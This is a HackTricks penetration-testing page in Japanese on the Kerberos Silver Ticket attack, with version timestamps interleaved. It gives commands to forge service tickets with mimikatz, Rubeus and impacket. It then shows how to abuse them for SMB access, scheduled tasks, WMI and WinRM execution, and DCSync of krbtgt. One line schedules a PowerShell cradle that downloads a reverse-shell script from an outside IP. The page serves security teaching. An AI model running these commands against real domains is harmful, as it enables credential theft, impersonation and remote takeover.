2024-02-08 03:59:37 +00:00
# Silver Ticket
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 03:59:37 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > を通じてゼロからヒーローまでAWSハッキングを学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 03:59:37 +00:00
HackTricksをサポートする他の方法:
2024-01-02 22:36:59 +00:00
2024-04-06 18:36:04 +00:00
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬** [**Discordグループ** ](https://discord.gg/hRep4RUj7f )**または**[**telegramグループ**](https://t.me/peass)**に参加**するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )で**フォロー**する。
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、**ハッキングトリックを共有**する。
2022-04-28 16:01:33 +00:00
< / details >
2024-02-18 14:52:15 +00:00
< figure > < img src = "../../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-04-06 18:36:04 +00:00
**バグバウンティのヒント**: **ハッカーによって作成されたプレミアムバグバウンティプラットフォーム**である**Intigriti**に**サインアップ**してください!今すぐ[**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks)に参加して、最大\*\*$100,000\*\*のバウンティを獲得し始めましょう!
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2020-07-15 15:43:14 +00:00
2024-02-08 03:59:37 +00:00
## Silver ticket
2020-07-15 15:43:14 +00:00
2024-02-18 14:52:15 +00:00
**Silver Ticket**攻撃は、Active Directory( AD) 環境でのサービスチケットの悪用を含みます。この方法は、コンピューターアカウントなどの**サービスアカウントのNTLMハッシュを取得**し、チケット発行サービス( TGS) チケットを偽造することに依存しています。この偽造されたチケットを使用すると、攻撃者はネットワーク上の特定のサービスにアクセスし、**通常は管理特権を狙って**任意のユーザーをなりすますことができます。チケットの偽造には、AESキーを使用することがより安全で検出されにくいことが強調されています。
2022-05-24 00:07:19 +00:00
2024-02-08 03:59:37 +00:00
チケットの作成には、オペレーティングシステムに基づいて異なるツールが使用されます:
2020-07-15 15:43:14 +00:00
2024-02-18 14:52:15 +00:00
### Linux上
2024-04-06 18:36:04 +00:00
2020-07-15 15:43:14 +00:00
```bash
2024-02-08 03:59:37 +00:00
python ticketer.py -nthash < HASH > -domain-sid < DOMAIN_SID > -domain < DOMAIN > -spn < SERVICE_PRINCIPAL_NAME > < USER >
export KRB5CCNAME=/root/impacket-examples/< TICKET_NAME > .ccache
python psexec.py < DOMAIN > /< USER > @< TARGET > -k -no-pass
2023-12-26 02:42:22 +00:00
```
2024-04-06 18:36:04 +00:00
2024-02-08 03:59:37 +00:00
### Windows上
2024-04-06 18:36:04 +00:00
2020-07-15 15:43:14 +00:00
```bash
2024-02-08 03:59:37 +00:00
# Create the ticket
mimikatz.exe "kerberos::golden /domain:< DOMAIN > /sid:< DOMAIN_SID > /rc4:< HASH > /user:< USER > /service:< SERVICE > /target:< TARGET > "
# Inject the ticket
mimikatz.exe "kerberos::ptt < TICKET_FILE > "
.\Rubeus.exe ptt /ticket:< TICKET_FILE >
# Obtain a shell
.\PsExec.exe -accepteula \\< TARGET > cmd
2020-07-15 15:43:14 +00:00
```
2024-04-06 18:36:04 +00:00
2024-02-08 03:59:37 +00:00
## 利用可能なサービス
2024-04-06 18:36:04 +00:00
| サービスタイプ | サービスシルバーチケット |
| ---------------------- | ------------------------------------------------------------- |
| WMI | < p > HOST< / p > < p > RPCSS< / p > |
| PowerShellリモート | < p > HOST< / p > < p > HTTP< / p > < p > OSによっては:< / p > < p > WSMAN< / p > < p > RPCSS< / p > |
| WinRM | < p > HOST< / p > < p > HTTP< / p > < p > 場合によっては: WINRM< / p > |
| スケジュールタスク | HOST |
| Windowsファイル共有、またpsexec | CIFS |
| LDAP操作、DCSyncを含む | LDAP |
| Windowsリモートサーバー管理ツール | < p > RPCSS< / p > < p > LDAP< / p > < p > CIFS< / p > |
| ゴールデンチケット | krbtgt |
2020-07-15 15:43:14 +00:00
2024-02-18 14:52:15 +00:00
**Rubeus**を使用して、以下のパラメータを使用してこれらのチケットをすべて要求できます:
2020-07-15 15:43:14 +00:00
2024-02-08 03:59:37 +00:00
* `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
2020-07-15 15:43:14 +00:00
2024-02-08 03:59:37 +00:00
### シルバーチケットのイベントID
2020-07-15 15:43:14 +00:00
2023-12-26 02:42:22 +00:00
* 4624: アカウントログオン
* 4634: アカウントログオフ
* 4672: 管理者ログオン
2020-07-15 15:43:14 +00:00
2023-12-26 02:42:22 +00:00
## サービスチケットの悪用
2021-01-04 23:12:42 +00:00
2024-02-08 03:59:37 +00:00
以下の例では、チケットが管理者アカウントを偽装して取得されたと想定しています。
2021-01-04 23:12:42 +00:00
2022-05-24 00:07:19 +00:00
### CIFS
2021-01-04 23:12:42 +00:00
2024-02-08 03:59:37 +00:00
このチケットを使用すると、`C$`および`ADMIN$`フォルダに**SMB**経由でアクセスし、リモートファイルシステムの一部にファイルをコピーすることができます。
2024-04-06 18:36:04 +00:00
2021-01-04 23:12:42 +00:00
```bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
```
2024-04-06 18:36:04 +00:00
2024-02-08 03:59:37 +00:00
### ホスト
2021-01-04 23:12:42 +00:00
2024-02-18 14:52:15 +00:00
この権限を使用すると、リモートコンピューターでスケジュールされたタスクを生成し、任意のコマンドを実行できます。
2024-04-06 18:36:04 +00:00
2021-01-04 23:12:42 +00:00
```bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
2021-07-20 16:34:25 +00:00
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
2021-01-04 23:12:42 +00:00
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
```
2024-04-06 18:36:04 +00:00
2022-05-24 00:07:19 +00:00
### HOST + RPCSS
2021-01-04 23:12:42 +00:00
2024-02-08 03:59:37 +00:00
これらのチケットを使用すると、**被害者システムでWMIを実行**できます。
2024-04-06 18:36:04 +00:00
2021-01-04 23:12:42 +00:00
```bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
#You can also use wmic
2021-07-26 15:11:57 +00:00
wmic remote.computer.local list full /format:list
2021-01-04 23:12:42 +00:00
```
2024-04-06 18:36:04 +00:00
2024-02-08 03:59:37 +00:00
以下のページで**wmiexecに関する詳細情報**を見つける:
2021-01-04 23:12:42 +00:00
2024-04-06 18:36:04 +00:00
{% content-ref url="../lateral-movement/wmicexec.md" %}
[wmicexec.md ](../lateral-movement/wmicexec.md )
2022-05-24 00:07:19 +00:00
{% endcontent-ref %}
2021-01-04 23:12:42 +00:00
2024-02-18 14:52:15 +00:00
### ホスト + WSMAN (WINRM)
2021-01-04 23:12:42 +00:00
2024-02-08 03:59:37 +00:00
コンピューター上でwinrmアクセスを使用すると、**アクセス**してPowerShellを取得できます:
2024-04-06 18:36:04 +00:00
2021-01-04 23:12:42 +00:00
```bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
```
2024-04-06 18:36:04 +00:00
2022-05-24 00:07:19 +00:00
### LDAP
2021-01-04 23:12:42 +00:00
2024-02-18 14:52:15 +00:00
この権限を使用すると、**DCSync**を使用してDCデータベースをダンプできます。
2024-04-06 18:36:04 +00:00
2022-05-24 00:07:19 +00:00
```
2021-01-04 23:12:42 +00:00
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
```
2024-04-06 18:36:04 +00:00
2024-02-09 02:33:52 +00:00
**DCSyncについて**は、以下のページで詳細を学ぶ:
2024-02-08 03:59:37 +00:00
## 参考文献
2024-02-18 14:52:15 +00:00
2024-02-08 03:59:37 +00:00
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets )
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/ ](https://www.tarlogic.com/blog/how-to-attack-kerberos/ )
2021-01-04 23:12:42 +00:00
2022-05-24 00:07:19 +00:00
{% content-ref url="dcsync.md" %}
[dcsync.md ](dcsync.md )
{% endcontent-ref %}
2024-02-18 14:52:15 +00:00
< figure > < img src = "../../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2021-01-04 23:12:42 +00:00
2024-04-06 18:36:04 +00:00
**バグバウンティのヒント**: **Intigriti**に**サインアップ**して、ハッカーによって作成されたプレミアム**バグバウンティプラットフォーム**に参加しましょう![**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks)で今すぐ登録して、最大\*\*$100,000\*\*のバウンティを獲得しましょう!
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-18 14:52:15 +00:00
< summary > < strong > **htARTE( HackTricks AWS Red Team Expert) **で**ゼロからヒーローまでのAWSハッキングを学ぶ**< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > こちら< / strong > < / a > < strong > ! < / strong > < / summary >
2024-01-02 22:36:59 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
* **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
2024-02-09 02:33:52 +00:00
* [**公式PEASS& HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
2024-02-18 14:52:15 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**telegramグループ**](https://t.me/peass)に**参加**したり、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )を**フォロー**する
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
2022-04-28 16:01:33 +00:00
< / details >